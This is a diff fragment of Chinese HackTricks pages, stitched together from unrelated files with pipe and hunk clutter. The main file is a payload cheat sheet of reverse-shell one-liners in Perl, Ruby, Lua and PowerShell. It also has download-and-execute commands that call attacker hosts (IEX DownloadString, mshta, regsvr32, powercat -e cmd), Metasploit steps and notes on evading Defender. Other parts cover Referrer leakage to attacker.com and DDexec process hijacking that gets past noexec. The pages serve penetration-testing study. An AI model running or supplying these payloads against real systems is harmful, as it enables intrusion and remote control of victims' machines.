perl -MIO -e '$c=new IO::Socket::INET(PeerAddr,"ATTACKING-IP:80");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'
|
||||
```
|
||||
## Ruby
|
||||
|
||||
## Ruby
|
||||
Ruby是一种动态、开源的面向对象编程语言,具有简洁而易读的语法。
|
||||
```bash
|
||||
#Windows
|
||||
ruby -rsocket -e 'c=TCPSocket.new("[IPADDR]","[PORT]");while(cmd=c.gets);IO.popen(cmd,"r"){|io|c.print io.read}end'
|
||||
```
|
||||
## Lua
|
||||
|
||||
Lua是一种轻量级、高效的脚本语言,常用于嵌入式系统和游戏开发中。 Lua脚本可以通过C语言编写的解释器来运行。 Lua具有简洁的语法和强大的扩展能力,被广泛应用于各种领域。 Lua脚本可以通过调用系统命令执行操作系统级别的任务。
|
||||
Lua是一种轻量级、高效的脚本语言,常用于嵌入式系统和游戏开发中。Lua脚本可以通过解释器直接执行,也可以编译成字节码在虚拟机上运行。Lua具有简洁的语法和强大的扩展能力,被广泛应用于各种领域。
|
||||
```bash
|
||||
lua5.1 -e 'local host, port = "127.0.0.1", 4444 local socket = require("socket") local tcp = socket.tcp() local io = require("io") tcp:connect(host, port); while true do local cmd, status, partial = tcp:receive() local f = io.popen(cmd, 'r') local s = f:read("*a") f:close() tcp:send(s) if status == "closed" then break end end tcp:close()'
|
||||
```
|
||||
|
@ -90,7 +91,9 @@ openssl.exe s_client -quiet -connect <ATTACKER_IP>:<PORT1>|cmd.exe|openssl s_cli
|
|||
```
|
||||
## Powershell
|
||||
|
||||
## Powershell
|
||||
### Powershell
|
||||
|
||||
Powershell是Windows系统中的强大脚本语言和命令行工具。它提供了丰富的功能和库,可用于执行各种系统管理任务和自动化操作。Powershell可以与.NET框架集成,使其具有强大的编程能力和灵活性。
|
||||
```bash
|
||||
powershell -exec bypass -c "(New-Object Net.WebClient).Proxy.Credentials=[Net.CredentialCache]::DefaultNetworkCredentials;iwr('http://10.2.0.5/shell.ps1')|iex"
|
||||
powershell "IEX(New-Object Net.WebClient).downloadString('http://10.10.14.9:8000/ipw.ps1')"
|
||||
|
@ -102,14 +105,14 @@ echo IEX(New-Object Net.WebClient).DownloadString('http://10.10.14.13:8000/Power
|
|||
```bash
|
||||
powershell -exec bypass -f \\webdavserver\folder\payload.ps1
|
||||
```
|
||||
网络调用执行的进程:**svchost.exe**\
|
||||
写入磁盘的有效载荷:**WebDAV客户端本地缓存**
|
||||
执行网络调用的进程:**svchost.exe**\
|
||||
写入磁盘的载荷:**WebDAV客户端本地缓存**
|
||||
|
||||
**一行代码:**
|
||||
**一句话总结:**
|
||||
```bash
|
||||
$client = New-Object System.Net.Sockets.TCPClient("10.10.10.10",80);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()
|
||||
```
|
||||
**在本文末尾获取有关不同Powershell Shell的更多信息**
|
||||
**在本文末尾获取有关不同Powershell Shells的更多信息**
|
||||
|
||||
## Mshta
|
||||
|
||||
|
@ -129,7 +132,7 @@ mshta \\webdavserver\folder\payload.hta
|
|||
```xml
|
||||
<scRipt language="VBscRipT">CreateObject("WscrIpt.SheLL").Run "powershell -ep bypass -w hidden IEX (New-ObjEct System.Net.Webclient).DownloadString('http://119.91.129.12:8080/1.ps1')"</scRipt>
|
||||
```
|
||||
**您可以非常容易地使用stager hta下载并执行Koadic僵尸程序**
|
||||
**您可以使用分段器hta轻松下载并执行Koadic僵尸程序**
|
||||
|
||||
#### hta示例
|
||||
|
||||
|
@ -168,7 +171,7 @@ var r = new ActiveXObject("WScript.Shell").Run("calc.exe");
|
|||
```
|
||||
#### **Mshta - Metasploit**
|
||||
|
||||
Mshta is a utility in Windows that executes Microsoft HTML Applications (HTA). Metasploit has a module that can be used to execute malicious HTA payloads using mshta.exe. This technique can be used to bypass application whitelisting and execute code on a target system.
|
||||
Mshta is a utility in Windows that is used to execute HTA (HTML Application) files. Metasploit has a module that can be used to execute malicious HTA payloads using mshta. This technique can be used to bypass application whitelisting and execute code on a target system.
|
||||
```bash
|
||||
use exploit/windows/misc/hta_server
|
||||
msf exploit(windows/misc/hta_server) > set srvhost 192.168.1.109
|
||||
|
@ -179,14 +182,14 @@ msf exploit(windows/misc/hta_server) > exploit
|
|||
```bash
|
||||
Victim> mshta.exe //192.168.1.109:8080/5EEiDSd70ET0k.hta #The file name is given in the output of metasploit
|
||||
```
|
||||
**被防御者检测到**
|
||||
**被defender检测到**
|
||||
|
||||
|
||||
|
||||
|
||||
## **Rundll32**
|
||||
|
||||
[**Dll 你好世界示例**](https://github.com/carterjones/hello-world-dll)
|
||||
[**Dll hello world example**](https://github.com/carterjones/hello-world-dll)
|
||||
|
||||
* [从这里](https://arno0x0x.wordpress.com/2017/11/20/windows-oneliners-to-download-remote-payload-and-execute-arbitrary-code/)
|
||||
```bash
|
||||
|
@ -244,7 +247,7 @@ regsvr32 /u /n /s /i:\\webdavserver\folder\payload.sct scrobj.dll
|
|||
|
||||
#### Regsvr32 -sct
|
||||
|
||||
[**从这里开始**](https://gist.github.com/Arno0x/81a8b43ac386edb7b437fe1408b15da1)
|
||||
[**从这里**](https://gist.github.com/Arno0x/81a8b43ac386edb7b437fe1408b15da1)
|
||||
```markup
|
||||
<?XML version="1.0"?>
|
||||
<!-- regsvr32 /u /n /s /i:http://webserver/regsvr32.sct scrobj.dll -->
|
||||
|
@ -270,7 +273,7 @@ set lhost 10.2.0.5
|
|||
run
|
||||
#You will be given the command to run in the victim: regsvr32 /s /n /u /i:http://10.2.0.5:8080/82j8mC8JBblt.sct scrobj.dll
|
||||
```
|
||||
**您可以使用stager regsvr轻松下载并执行Koadic僵尸程序**
|
||||
**您可以使用stager regsvr轻松下载并执行Koadic僵尸**
|
||||
|
||||
## Certutil
|
||||
|
||||
|
@ -302,7 +305,7 @@ msfvenom -p cmd/windows/reverse_powershell lhost=10.2.0.5 lport=4444 -f vbs > sh
|
|||
\\webdavserver\folder\batchfile.bat
|
||||
```
|
||||
执行网络调用的进程:**svchost.exe**\
|
||||
写入磁盘的有效载荷:**WebDAV 客户端本地缓存**
|
||||
写入磁盘的有效负载:**WebDAV客户端本地缓存**
|
||||
```bash
|
||||
msfvenom -p cmd/windows/reverse_powershell lhost=10.2.0.5 lport=4444 > shell.bat
|
||||
impacket-smbserver -smb2support kali `pwd`
|
||||
|
@ -401,7 +404,7 @@ odbcconf /s /a {regsvr \\webdavserver\folder\payload_dll.txt}
|
|||
```
|
||||
Invoke-PowerShellTcp -Reverse -IPAddress 10.2.0.5 -Port 4444
|
||||
```
|
||||
在Web服务器上开始提供脚本,并在受害者端执行它:
|
||||
开始在web服务器上提供脚本,并在受害者端执行:
|
||||
```
|
||||
powershell -exec bypass -c "iwr('http://10.11.0.134/shell2.ps1')|iex"
|
||||
```
|
||||
|
@ -417,9 +420,11 @@ Defender尚未将其检测为恶意代码(截至2019年3月4日)。
|
|||
```
|
||||
powershell -exec bypass -c "iwr('http://10.2.0.5/powercat.ps1')|iex;powercat -c 10.2.0.5 -p 4444 -e cmd"
|
||||
```
|
||||
Defender尚未将其检测为恶意代码(截至2019年3月4日)。
|
||||
|
||||
**powercat提供的其他选项:**
|
||||
|
||||
绑定shell、反向shell(TCP、UDP、DNS)、端口重定向、上传/下载、生成载荷、提供文件...
|
||||
绑定shell,反向shell(TCP,UDP,DNS),端口重定向,上传/下载,生成有效载荷,提供文件...
|
||||
```
|
||||
Serve a cmd Shell:
|
||||
powercat -l -p 443 -e cmd
|
||||
|
@ -440,7 +445,7 @@ powercat -l -p 443 -i C:\inputfile -rep
|
|||
|
||||
[https://github.com/EmpireProject/Empire](https://github.com/EmpireProject/Empire)
|
||||
|
||||
创建一个PowerShell启动器,保存到文件中,然后下载并执行它。
|
||||
创建一个PowerShell启动器,保存在一个文件中,然后下载并执行它。
|
||||
```
|
||||
powershell -exec bypass -c "iwr('http://10.2.0.5/launcher.ps1')|iex;powercat -c 10.2.0.5 -p 4444 -e cmd"
|
||||
```
|
||||
|
@ -450,25 +455,24 @@ powershell -exec bypass -c "iwr('http://10.2.0.5/launcher.ps1')|iex;powercat -c
|
|||
|
||||
[https://github.com/trustedsec/unicorn](https://github.com/trustedsec/unicorn)
|
||||
|
||||
使用unicorn创建metasploit后门的PowerShell版本
|
||||
使用unicorn创建metasploit后门的powershell版本
|
||||
```
|
||||
python unicorn.py windows/meterpreter/reverse_https 10.2.0.5 443
|
||||
```
|
||||
使用创建的资源启动msfconsole:
|
||||
使用创建的资源启动 msfconsole:
|
||||
```
|
||||
msfconsole -r unicorn.rc
|
||||
```
|
||||
在受害者上启动一个提供_powershell\_attack.txt_文件的Web服务器,并执行:
|
||||
开始一个提供_powershell\_attack.txt_文件的Web服务器,并在受害者系统中执行:
|
||||
```
|
||||
powershell -exec bypass -c "iwr('http://10.2.0.5/powershell_attack.txt')|iex"
|
||||
```
|
||||
**检测到恶意代码**
|
||||
**检测为恶意代码**
|
||||
|
||||
## 更多
|
||||
|
||||
[PS>Attack](https://github.com/jaredhaight/PSAttack) PS控制台,预装一些具有攻击性的PS模块(加密)\
|
||||
[https://gist.github.com/NickTyrer/92344766f1d4d48b15687e5e4bf6f9](https://gist.github.com/NickTyrer/92344766f1d4d48b15687e5e4bf6f93c)[\
|
||||
WinPWN](https://github.com/SecureThisShit/WinPwn) PS控制台,预装一些具有攻击性的PS模块和代理检测(IEX)
|
||||
[WinPWN](https://github.com/SecureThisShit/WinPwn) PS控制台,预装一些具有攻击性的PS模块和代理检测(IEX)
|
||||
|
||||
## 参考资料
|
||||
|
||||
|
@ -486,16 +490,17 @@ WinPWN](https://github.com/SecureThisShit/WinPwn) PS控制台,预装一些具
|
|||
|
||||
{% embed url="https://discord.gg/tryhardsecurity" %}
|
||||
|
||||
{% hint style="success" %}
|
||||
学习并练习AWS黑客技术:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
|
||||
学习并练习GCP黑客技术:<img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
|
||||
|
||||
<details>
|
||||
|
||||
<summary><strong>从零开始学习AWS黑客技术,成为专家</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE(HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
<summary>支持HackTricks</summary>
|
||||
|
||||
支持HackTricks的其他方式:
|
||||
|
||||
* 如果您想在HackTricks中看到您的**公司广告**或**下载PDF格式的HackTricks**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
|
||||
* 获取[**官方PEASS & HackTricks周边产品**](https://peass.creator-spring.com)
|
||||
* 发现[**PEASS家族**](https://opensea.io/collection/the-peass-family),我们的独家[NFTs](https://opensea.io/collection/the-peass-family)收藏品
|
||||
* **加入** 💬 [**Discord群**](https://discord.gg/hRep4RUj7f) 或 [**电报群**](https://t.me/peass) 或在**Twitter**上关注我们 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**。**
|
||||
* 通过向[**HackTricks**](https://github.com/carlospolop/hacktricks)和[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github仓库提交PR来分享您的黑客技巧。
|
||||
* 查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
|
||||
* **加入** 💬 [**Discord群**](https://discord.gg/hRep4RUj7f) 或 [**telegram群**](https://t.me/peass) 或 **关注**我们的 **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
|
||||
* 通过向[**HackTricks**](https://github.com/carlospolop/hacktricks)和[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github仓库提交PR来分享黑客技巧。
|
||||
|
||||
</details>
|
||||
{% endhint %}
|
||||
|
|
|
@ -1,29 +1,30 @@
|
|||
{% hint style="success" %}
|
||||
学习并练习AWS黑客技术:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks培训AWS红队专家(ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
|
||||
学习并练习GCP黑客技术:<img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks培训GCP红队专家(GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
|
||||
|
||||
<details>
|
||||
|
||||
<summary><strong>从零到英雄学习AWS黑客攻击</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
<summary>支持HackTricks</summary>
|
||||
|
||||
支持HackTricks的其他方式:
|
||||
|
||||
* 如果您想在**HackTricks中看到您的公司广告**或**下载HackTricks的PDF**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
|
||||
* 获取[**官方PEASS & HackTricks商品**](https://peass.creator-spring.com)
|
||||
* 发现[**PEASS家族**](https://opensea.io/collection/the-peass-family),我们独家的[**NFTs系列**](https://opensea.io/collection/the-peass-family)
|
||||
* **加入** 💬 [**Discord群组**](https://discord.gg/hRep4RUj7f) 或 [**telegram群组**](https://t.me/peass) 或在 **Twitter** 🐦 上**关注**我 [**@carlospolopm**](https://twitter.com/carlospolopm)**。**
|
||||
* **通过向** [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github仓库提交PR来分享您的黑客技巧。**
|
||||
* 检查[**订阅计划**](https://github.com/sponsors/carlospolop)!
|
||||
* **加入** 💬 [**Discord群组**](https://discord.gg/hRep4RUj7f) 或 [**电报群组**](https://t.me/peass) 或 **关注**我们的**Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
|
||||
* **通过向** [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) **github仓库提交PR来分享黑客技巧。**
|
||||
|
||||
</details>
|
||||
{% endhint %}
|
||||
|
||||
|
||||
# Referrer头部和策略
|
||||
# 引荐者标头和策略
|
||||
|
||||
Referrer是浏览器用来指示访问者之前访问的页面的头部。
|
||||
引荐者是浏览器用来指示之前访问的页面的标头。
|
||||
|
||||
## 泄露敏感信息
|
||||
## 泄露的敏感信息
|
||||
|
||||
如果在网页的某个地方,任何敏感信息位于GET请求参数中,如果页面包含指向外部资源的链接,或者攻击者能够使/建议(社会工程)用户访问由攻击者控制的URL。攻击者可能能够从最后的GET请求中窃取敏感信息。
|
||||
如果在网页中的某个位置存在任何敏感信息在GET请求参数中,如果页面包含指向外部来源的链接或攻击者能够制作/建议(社会工程)用户访问受攻击者控制的URL。攻击者可能能够在最新的GET请求中窃取敏感信息。
|
||||
|
||||
## 缓解措施
|
||||
|
||||
您可以使浏览器遵循一个**Referrer-policy**,该策略可以**避免**将敏感信息发送到其他网络应用程序:
|
||||
您可以让浏览器遵循一个**引荐者策略**,这可以**避免**敏感信息被发送到其他Web应用程序:
|
||||
```
|
||||
Referrer-Policy: no-referrer
|
||||
Referrer-Policy: no-referrer-when-downgrade
|
||||
|
@ -34,28 +35,28 @@ Referrer-Policy: strict-origin
|
|||
Referrer-Policy: strict-origin-when-cross-origin
|
||||
Referrer-Policy: unsafe-url
|
||||
```
|
||||
## 反缓解措施
|
||||
## 对抗措施
|
||||
|
||||
您可以使用HTML元标签覆盖此规则(攻击者需要利用HTML注入):
|
||||
您可以使用 HTML meta 标签覆盖此规则(攻击者需要利用 HTML 注入):
|
||||
```markup
|
||||
<meta name="referrer" content="unsafe-url">
|
||||
<img src="https://attacker.com">
|
||||
```
|
||||
## 防御
|
||||
|
||||
永远不要在URL的GET参数或路径中放置任何敏感数据。
|
||||
永远不要将任何敏感数据放在URL的GET参数或路径中。
|
||||
|
||||
{% hint style="success" %}
|
||||
学习并实践AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks 培训 AWS 红队专家 (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
|
||||
学习并实践GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks 培训 GCP 红队专家 (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
|
||||
|
||||
<details>
|
||||
|
||||
<summary><strong>从零开始学习AWS黑客攻击直到成为专家,通过</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
<summary>支持 HackTricks</summary>
|
||||
|
||||
支持HackTricks的其他方式:
|
||||
|
||||
* 如果您想在**HackTricks中看到您的公司广告**或**下载HackTricks的PDF版本**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
|
||||
* 获取[**官方的PEASS & HackTricks商品**](https://peass.creator-spring.com)
|
||||
* 发现[**PEASS家族**](https://opensea.io/collection/the-peass-family),我们独家的[**NFTs系列**](https://opensea.io/collection/the-peass-family)
|
||||
* **加入** 💬 [**Discord群组**](https://discord.gg/hRep4RUj7f) 或 [**telegram群组**](https://t.me/peass) 或在 **Twitter** 🐦 上**关注**我 [**@carlospolopm**](https://twitter.com/carlospolopm)**。**
|
||||
* **通过向** [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github仓库提交PR来分享您的黑客技巧。
|
||||
* 检查[**订阅计划**](https://github.com/sponsors/carlospolop)!
|
||||
* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**电报群组**](https://t.me/peass) 或 **关注**我们的 **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
|
||||
* 通过向 [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github 仓库提交 PR 来分享黑客技巧。
|
||||
|
||||
</details>
|
||||
{% endhint %}
|
||||
|
|
|
@ -1,30 +1,31 @@
|
|||
# DDexec / EverythingExec
|
||||
|
||||
{% hint style="success" %}
|
||||
学习并练习AWS黑客技术:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks 培训 AWS 红队专家 (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
|
||||
学习并练习GCP黑客技术:<img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks 培训 GCP 红队专家 (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
|
||||
|
||||
<details>
|
||||
|
||||
<summary><strong>从零开始学习AWS黑客技术,成为专家</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE(HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
<summary>支持 HackTricks</summary>
|
||||
|
||||
支持HackTricks的其他方式:
|
||||
|
||||
* 如果您想看到您的**公司在HackTricks中做广告**或**下载PDF格式的HackTricks**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
|
||||
* 获取[**官方PEASS & HackTricks周边产品**](https://peass.creator-spring.com)
|
||||
* 探索[**PEASS家族**](https://opensea.io/collection/the-peass-family),我们的独家[**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||
* **加入** 💬 [**Discord群**](https://discord.gg/hRep4RUj7f) 或 [**电报群**](https://t.me/peass) 或 **关注**我们的**Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**。**
|
||||
* 通过向[**HackTricks**](https://github.com/carlospolop/hacktricks)和[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github仓库提交PR来分享您的黑客技巧。
|
||||
* 检查[**订阅计划**](https://github.com/sponsors/carlospolop)!
|
||||
* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**电报群组**](https://t.me/peass) 或 **关注**我们的**Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
|
||||
* **通过向** [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) **github 仓库提交 PR 来分享黑客技巧。**
|
||||
|
||||
</details>
|
||||
{% endhint %}
|
||||
|
||||
## 上下文
|
||||
|
||||
在Linux中,为了运行程序,它必须作为一个文件存在,必须以某种方式通过文件系统层次结构进行访问(这就是`execve()`的工作原理)。这个文件可以存在于磁盘上或内存中(tmpfs,memfd),但你需要一个文件路径。这使得在Linux系统上控制运行什么变得非常容易,也很容易检测威胁和攻击者的工具,或者防止它们尝试执行任何自己的东西(例如,不允许非特权用户在任何地方放置可执行文件)。
|
||||
在Linux中,为了运行一个程序,它必须作为一个文件存在,必须以某种方式通过文件系统层次结构进行访问(这就是`execve()`的工作原理)。这个文件可以驻留在磁盘上或内存中(tmpfs,memfd),但你需要一个文件路径。这使得在Linux系统上控制运行什么变得非常容易,它可以轻松检测威胁和攻击者的工具,或者防止它们尝试执行任何自己的东西(例如,不允许非特权用户在任何地方放置可执行文件)。
|
||||
|
||||
但是这项技术可以改变这一切。如果您无法启动想要的进程... **那么您就劫持一个已经存在的进程**。
|
||||
但是这项技术可以改变这一切。如果你无法启动你想要的进程... **那么你就劫持一个已经存在的进程**。
|
||||
|
||||
这项技术允许您**绕过常见的保护技术,如只读、noexec、文件名白名单、哈希白名单...**
|
||||
这项技术允许你**绕过常见的保护技术,如只读、noexec、文件名白名单、哈希白名单...**
|
||||
|
||||
## 依赖关系
|
||||
|
||||
最终脚本依赖于以下工具才能正常工作,它们需要在您攻击的系统中可访问(默认情况下,您将在任何地方找到它们):
|
||||
最终脚本依赖于以下工具才能工作,它们需要在你攻击的系统中可访问(默认情况下,你将在任何地方找到它们):
|
||||
```
|
||||
dd
|
||||
bash | zsh | ash (busybox)
|
||||
|
@ -40,49 +41,49 @@ base64
|
|||
```
|
||||
## 技术
|
||||
|
||||
如果您能任意修改进程的内存,则可以接管该进程。这可以用来劫持已经存在的进程并用另一个程序替换它。我们可以通过使用`ptrace()`系统调用(需要您能够执行系统调用或在系统上有gdb可用)或者更有趣的是,写入`/proc/$pid/mem`来实现这一点。
|
||||
如果您能任意修改进程的内存,则可以接管该进程。这可以用来劫持已经存在的进程并用另一个程序替换它。我们可以通过使用 `ptrace()` 系统调用(需要您能够执行系统调用或在系统上有 gdb 可用)或者更有趣的是,写入 `/proc/$pid/mem` 来实现这一点。
|
||||
|
||||
文件`/proc/$pid/mem`是进程整个地址空间的一对一映射(例如从`0x0000000000000000`到`0x7ffffffffffff000`在x86-64中)。这意味着从该文件的偏移`x`读取或写入与从虚拟地址`x`读取或修改内容是相同的。
|
||||
文件 `/proc/$pid/mem` 是进程整个地址空间的一对一映射(例如从 `0x0000000000000000` 到 `0x7ffffffffffff000` 在 x86-64 中)。这意味着从文件的偏移量 `x` 读取或写入与在虚拟地址 `x` 处读取或修改内容是相同的。
|
||||
|
||||
现在,我们需要面对四个基本问题:
|
||||
|
||||
- 通常只有root和文件的程序所有者可以修改它。
|
||||
- ASLR。
|
||||
- 如果我们尝试读取或写入未映射在程序地址空间中的地址,将会收到I/O错误。
|
||||
* 通常只有 root 和文件的程序所有者可以修改它。
|
||||
* ASLR。
|
||||
* 如果我们尝试读取或写入未映射在程序地址空间中的地址,将会收到 I/O 错误。
|
||||
|
||||
这些问题有解决方案,虽然它们不是完美的,但是很好:
|
||||
|
||||
- 大多数shell解释器允许创建文件描述符,然后将其继承给子进程。我们可以创建一个指向shell的`mem`文件的具有写权限的fd...因此使用该fd的子进程将能够修改shell的内存。
|
||||
- ASLR甚至不是问题,我们可以检查shell的`maps`文件或procfs中的任何其他文件,以获取有关进程地址空间的信息。
|
||||
- 因此,我们需要在文件上执行`lseek()`。从shell中,除非使用臭名昭著的`dd`,否则无法执行此操作。
|
||||
* 大多数 shell 解释器允许创建文件描述符,然后将其继承给子进程。我们可以创建一个指向 shell 的 `mem` 文件的具有写权限的 fd... 因此使用该 fd 的子进程将能够修改 shell 的内存。
|
||||
* ASLR 甚至不是问题,我们可以检查 shell 的 `maps` 文件或 procfs 中的任何其他文件,以获取有关进程地址空间的信息。
|
||||
* 因此,我们需要在文件上执行 `lseek()`。从 shell 中,除非使用臭名昭著的 `dd`,否则无法执行此操作。
|
||||
|
||||
### 更详细地
|
||||
|
||||
这些步骤相对简单,不需要任何专业知识来理解它们:
|
||||
|
||||
- 解析我们想要运行的二进制文件和加载器,找出它们需要的映射。然后编写一个“shell”代码,它将执行大致相同的步骤,即内核在每次调用`execve()`时执行的步骤:
|
||||
- 创建这些映射。
|
||||
- 将二进制文件读入其中。
|
||||
- 设置权限。
|
||||
- 最后,使用程序参数初始化堆栈,并放置加载器所需的辅助向量。
|
||||
- 跳转到加载器,让它完成剩下的工作(加载程序所需的库)。
|
||||
- 从`syscall`文件中获取进程在执行系统调用后将返回的地址。
|
||||
- 用我们的shell代码覆盖该位置,该位置将是可执行的(通过`mem`我们可以修改不可写的页面)。
|
||||
- 将要运行的程序传递给进程的stdin(将由所述“shell”代码`read()`)。
|
||||
- 到这一步,加载器将加载我们程序所需的必要库并跳转到它。
|
||||
* 解析我们想要运行的二进制文件和加载器,找出它们需要的映射。然后编写一个将执行大致相同步骤的“shell”代码,即内核在每次调用 `execve()` 时执行的步骤:
|
||||
* 创建这些映射。
|
||||
* 将二进制文件读入其中。
|
||||
* 设置权限。
|
||||
* 最后,使用程序参数初始化堆栈,并放置加载器所需的辅助向量。
|
||||
* 跳转到加载器,让它完成剩下的工作(加载程序所需的库)。
|
||||
* 从 `syscall` 文件中获取进程在执行系统调用后将返回的地址。
|
||||
* 用我们的 shellcode 覆盖该位置,该位置将是可执行的(通过 `mem` 我们可以修改不可写的页面)。
|
||||
* 将要运行的程序传递给进程的 stdin(将被上述“shell”代码 `read()`)。
|
||||
* 到此为止,加载器将加载我们程序所需的必要库并跳转到它。
|
||||
|
||||
**查看工具** [**https://github.com/arget13/DDexec**](https://github.com/arget13/DDexec)
|
||||
|
||||
## EverythingExec
|
||||
|
||||
有几种替代方案可以替代`dd`,其中之一是`tail`,目前是用于通过`mem`文件`lseek()`的默认程序(这是使用`dd`的唯一目的)。这些替代方案包括:
|
||||
有几种替代方案可以替代 `dd`,其中之一是 `tail`,目前是用于通过 `mem` 文件执行 `lseek()` 的默认程序(这是使用 `dd` 的唯一目的)。这些替代方案包括:
|
||||
```bash
|
||||
tail
|
||||
hexdump
|
||||
cmp
|
||||
xxd
|
||||
```
|
||||
通过设置变量 `SEEKER`,您可以更改所使用的搜索器,例如:
|
||||
通过设置变量 `SEEKER`,您可以更改所使用的查找器,例如:
|
||||
```bash
|
||||
SEEKER=cmp bash ddexec.sh ls -l <<< $(base64 -w0 /bin/ls)
|
||||
```
|
||||
|
@ -95,16 +96,17 @@ SEEKER=xxd SEEKER_ARGS='-s $offset' zsh ddexec.sh ls -l <<< $(base64 -w0 /bin/ls
|
|||
## 参考
|
||||
* [https://github.com/arget13/DDexec](https://github.com/arget13/DDexec)
|
||||
|
||||
{% hint style="success" %}
|
||||
学习并练习AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks 培训 AWS 红队专家 (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
|
||||
学习并练习GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks 培训 GCP 红队专家 (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
|
||||
|
||||
<details>
|
||||
|
||||
<summary><strong>从零开始学习AWS黑客技术,成为专家</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE(HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
<summary>支持 HackTricks</summary>
|
||||
|
||||
支持HackTricks的其他方式:
|
||||
|
||||
* 如果您想在HackTricks中看到您的**公司广告**或**下载PDF格式的HackTricks**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
|
||||
* 获取[**官方PEASS & HackTricks周边产品**](https://peass.creator-spring.com)
|
||||
* 探索[**PEASS家族**](https://opensea.io/collection/the-peass-family),我们的独家[**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||
* **加入** 💬 [**Discord群**](https://discord.gg/hRep4RUj7f) 或 [**电报群**](https://t.me/peass) 或 **关注**我们的**Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**。**
|
||||
* 通过向[**HackTricks**](https://github.com/carlospolop/hacktricks)和[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github仓库提交PR来分享您的黑客技巧。
|
||||
* 检查[**订阅计划**](https://github.com/sponsors/carlospolop)!
|
||||
* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**电报群组**](https://t.me/peass) 或 **关注**我们的 **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
|
||||
